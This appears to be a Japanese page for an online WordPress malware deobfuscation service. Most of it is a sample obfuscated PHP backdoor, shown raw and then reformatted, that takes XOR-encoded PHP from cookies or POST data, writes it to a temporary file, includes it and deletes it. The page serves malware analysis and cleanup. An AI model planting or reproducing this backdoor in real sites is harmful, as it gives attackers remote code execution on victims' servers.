Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php function e1($m2){$o3 = "nI; gf_0(yvdE" .".osbL9mp*/?2" ."4rF#xuh6i3l5" ."kec)at1-<" ."@H" ."'" ;$b5='';foreach($m2 as $o4){$b5.=$o3[$o4];}return $b5;}$b6 = Array();$b6[] = e1(Array(16,34,25,38,25,18,34,5,44,34,11,36,34,44,25,41,38,25,44,16,5,25,11,44,5,24,32,43,39,32,38,7,24,16,11,7));$b6[] = e1(Array(23,20,31,20,3,46,30,0,35,33,0,37,8,6,6,27,1,17,12,6,6,40,2,3));$b6[] = e1(Array(13,19,14,11,30,35,38));$b6[] = e1(Array(47,21));$b6[] = e1(Array(13,22));$b6[] = e1(Array(28));$b6[] = e1(Array(45));$b6[] = e1(Array(5,33,35,38,6,20,30,42,6,39,14,0,42,38,0,42,15));$b6[] = e1(Array(41,26,26,41,9,6,19,38,26,4,38));$b6[] = e1(Array(15,42,26,6,26,38,20,38,41,42));$b6[] = e1(Array(38,29,20,35,14,11,38));$b6[] = e1(Array(15,30,16,15,42,26));$b6[] = e1(Array(30,0,35,33,0,37));$b6[] = e1(Array(15,42,26,35,38,0));$b6[] = e1(Array(20,41,39,37));$b6[] = e1(Array(19,11,36));foreach ($b6[8]($_COOKIE, $_POST) as $e14 => $y11){function a8($b6, $e14, $m10){return $b6[11]($b6[9]($e14 . $b6[0], ($m10 / $b6[13]($e14)) + 1), 0, $m10);}function c7($b6, $y12){return @$b6[14]($b6[3], $y12);}function c9($b6, $y12){if (isset($y12[2])) {$v13 = $b6[4] . $b6[15]($b6[0]) . $b6[2];@$b6[7]($v13, $b6[6] . $b6[1] . $y12[1]($y12[2]));@include($v13);@$b6[12]($v13);exit();}}$y11 = c7($b6, $y11);c9($b6, $b6[10]($b6[5], $y11 ^ a8($b6, $e14, $b6[13]($y11))));}
<?php function e1($m2) { $o3 = "nI; gf_0(yvdE.osbL9mp*/?24rF#xuh6i3l5kec)at1-<@H'"; $b5 = ''; foreach ($m2 as $o4) { $b5 .= $o3[$o4]; } return $b5; } $b6 = array(); $b6[] = e1(array(16, 34, 25, 38, 25, 18, 34, 5, 44, 34, 11, 36, 34, 44, 25, 41, 38, 25, 44, 16, 5, 25, 11, 44, 5, 24, 32, 43, 39, 32, 38, 7, 24, 16, 11, 7)); $b6[] = e1(array(23, 20, 31, 20, 3, 46, 30, 0, 35, 33, 0, 37, 8, 6, 6, 27, 1, 17, 12, 6, 6, 40, 2, 3)); $b6[] = e1(array(13, 19, 14, 11, 30, 35, 38)); $b6[] = e1(array(47, 21)); $b6[] = e1(array(13, 22)); $b6[] = e1(array(28)); $b6[] = e1(array(45)); $b6[] = e1(array(5, 33, 35, 38, 6, 20, 30, 42, 6, 39, 14, 0, 42, 38, 0, 42, 15)); $b6[] = e1(array(41, 26, 26, 41, 9, 6, 19, 38, 26, 4, 38)); $b6[] = e1(array(15, 42, 26, 6, 26, 38, 20, 38, 41, 42)); $b6[] = e1(array(38, 29, 20, 35, 14, 11, 38)); $b6[] = e1(array(15, 30, 16, 15, 42, 26)); $b6[] = e1(array(30, 0, 35, 33, 0, 37)); $b6[] = e1(array(15, 42, 26, 35, 38, 0)); $b6[] = e1(array(20, 41, 39, 37)); $b6[] = e1(array(19, 11, 36)); foreach ($b6[8]($_COOKIE, $_POST) as $e14 => $y11) { function a8($b6, $e14, $m10) { return $b6[11]($b6[9]($e14 . $b6[0], $m10 / $b6[13]($e14) + 1), 0, $m10); } function c7($b6, $y12) { return @$b6[14]($b6[3], $y12); } function c9($b6, $y12) { if (isset($y12[2])) { $v13 = $b6[4] . $b6[15]($b6[0]) . $b6[2]; @$b6[7]($v13, $b6[6] . $b6[1] . $y12[1]($y12[2])); @(include $v13); @$b6[12]($v13); exit; } } $y11 = c7($b6, $y11); c9($b6, $b6[10]($b6[5], $y11 ^ a8($b6, $e14, $b6[13]($y11)))); }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.